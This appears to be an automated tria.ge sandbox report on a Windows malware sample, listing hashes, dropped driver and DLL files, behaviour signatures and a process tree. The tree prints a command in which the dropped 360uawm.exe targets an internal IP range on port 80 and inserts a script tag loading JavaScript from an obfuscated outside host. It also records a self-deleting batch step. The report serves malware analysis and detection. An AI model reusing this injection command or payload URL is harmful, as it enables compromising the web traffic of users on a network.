Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
29/12/2023, 20:30
Static task
static1
Behavioral task
behavioral1
Sample
032d7cb609f83f27964560bebfc37a04.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
032d7cb609f83f27964560bebfc37a04.exe
Resource
win10v2004-20231215-en
General
-
Target
032d7cb609f83f27964560bebfc37a04.exe
-
Size
525KB
-
MD5
032d7cb609f83f27964560bebfc37a04
-
SHA1
c8aa87b6ba9d7d5432b6426b94d148e46b9073ac
-
SHA256
30b6789a6a49c7b5a82d2c2ddf52d1c77ce50ce0b8b2568d4edde594e5d4652e
-
SHA512
c8314ea1ee32dac8a2cd954792b1d69e0f4af7f8d98949544bbcba96685870045c51db2de81e05f7ceea1210f963a5ae87f5132df394003dc4231e75319e6e0f
-
SSDEEP
6144:wM8MSbxohE9q2PsXrSVew/X2+wZHeSPVep6s6BCF6GfEWfadRNH0QOPoS:wHNx2E9/cZw/X6eSPtfS6G6aPoS
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\npf.sys 032d7cb609f83f27964560bebfc37a04.exe -
Deletes itself 1 IoCs
pid Process 2348 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2564 360uawm.exe -
Loads dropped DLL 8 IoCs
pid Process 2052 032d7cb609f83f27964560bebfc37a04.exe 2052 032d7cb609f83f27964560bebfc37a04.exe 2564 360uawm.exe 2564 360uawm.exe 2564 360uawm.exe 2564 360uawm.exe 2564 360uawm.exe 2564 360uawm.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\SysWOW64\wpcap.dll 032d7cb609f83f27964560bebfc37a04.exe File created C:\Windows\SysWOW64\360uawm.exe 032d7cb609f83f27964560bebfc37a04.exe File created C:\Windows\SysWOW64\npptools.dll 032d7cb609f83f27964560bebfc37a04.exe File created C:\Windows\SysWOW64\Packet.dll 032d7cb609f83f27964560bebfc37a04.exe File created C:\Windows\SysWOW64\WanPacket.dll 032d7cb609f83f27964560bebfc37a04.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1036 PING.EXE -
Suspicious behavior: LoadsDriver 13 IoCs
pid Process 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2052 wrote to memory of 2564 2052 032d7cb609f83f27964560bebfc37a04.exe 30 PID 2052 wrote to memory of 2564 2052 032d7cb609f83f27964560bebfc37a04.exe 30 PID 2052 wrote to memory of 2564 2052 032d7cb609f83f27964560bebfc37a04.exe 30 PID 2052 wrote to memory of 2564 2052 032d7cb609f83f27964560bebfc37a04.exe 30 PID 2052 wrote to memory of 2348 2052 032d7cb609f83f27964560bebfc37a04.exe 32 PID 2052 wrote to memory of 2348 2052 032d7cb609f83f27964560bebfc37a04.exe 32 PID 2052 wrote to memory of 2348 2052 032d7cb609f83f27964560bebfc37a04.exe 32 PID 2052 wrote to memory of 2348 2052 032d7cb609f83f27964560bebfc37a04.exe 32 PID 2348 wrote to memory of 1036 2348 cmd.exe 34 PID 2348 wrote to memory of 1036 2348 cmd.exe 34 PID 2348 wrote to memory of 1036 2348 cmd.exe 34 PID 2348 wrote to memory of 1036 2348 cmd.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\032d7cb609f83f27964560bebfc37a04.exe"C:\Users\Admin\AppData\Local\Temp\032d7cb609f83f27964560bebfc37a04.exe"1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\SysWOW64\360uawm.exe-idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://e%64a.P%61ss%69ngG%61s.n%65t/tj.js></script>"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2564
-
-
C:\Windows\SysWOW64\cmd.execmd /c 12.bat2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1036
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e28b0984987b3198b0ea88b1dff17589
SHA1645973855c5ed1de7bfecc1f8dfa78d77bfd84fa
SHA2561a13a98760406d0401b4d8b4262f47b4592bf29453abd68bed8a941052d795a2
SHA5121e3816e034bb8b3cd495bac4037a56cb6b3b6b902c4a3754205499f1455db21b06fd86a0acc7ba44f39291f1790d7cc92602e64daa960c6fabb2d403778df528
-
Filesize
8.0MB
MD535d7e2fa6e9b564de6af2f8221ee5662
SHA117996eedbc331b4da56aa598b75ad7be7252b091
SHA256935b6deaa64dea3edd2a237c2c1effbbce2b730025f79ddee1083a2228678294
SHA512ade0e30cc55ba1c6b37fa9b268c5e4530d448723a80fd3c16673383be11fcf50204917222779a8924bdaa33b5514d02b32647ab7352cd4995c67f9ecd73d51e9
-
Filesize
7.7MB
MD5236b9925a1b0197cc3ce3c68a3969908
SHA1033d1b3e4050db94909cc318494bd875b6e6146e
SHA256d5a5f85a520e94955cd8f7a0d8a7ebe3fb5210ee6403a03ca29085fd86806ed6
SHA51295bddb88b98e914f2e02f76487b6306b45d696fc2b6082c20bcfadb815ff2588758e415a7bb4b492ab325d95646caa91bc9d957940b68d9881ec85ab626a29c3
-
Filesize
53KB
MD5841007a04750a9acb56dd82095300d15
SHA158c1e338bc78a54795a844b559b614004e53d3cb
SHA256a15c409af481494fa8c3d82ec0dc7c67075a706160cc060bec982e40c060d578
SHA512dcaeae21ffc2479fc595632a93e082396caea1eb6c4093e24c199a5ee3dd09248dfb5fe11ea200034e2be928b2db09218d9d763428294347ccd63f4cad4c06de
-
Filesize
6.2MB
MD569be6b247090edaaa40bdcb21e145444
SHA17397fe3bcba13a3593eedec76f8f263396a853af
SHA2561217556c02e3c53b91965bd4ca878936ce836c4c9aa7de07f69b15ff430b3e2b
SHA51240d86432571e78ed1fe27370d36896b644e1b7c0aaabadfcdd1e7cc89c38290726dc61a1c07217ce71519f5f5b81d76efc2bcfcf52528b109f9e1f653d805beb
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
41KB
MD5b15e0180c43d8b5219196d76878cc2dd
SHA133e676b37a3380de32c10ba5bc9170997445d314
SHA256a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab
SHA51247e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09
-
Filesize
234KB
MD5ce842d25e5b7e6ff21a86cad9195fbe8
SHA1d762270be089a89266b012351b52c595e260b59b
SHA2567e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3
SHA51284c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6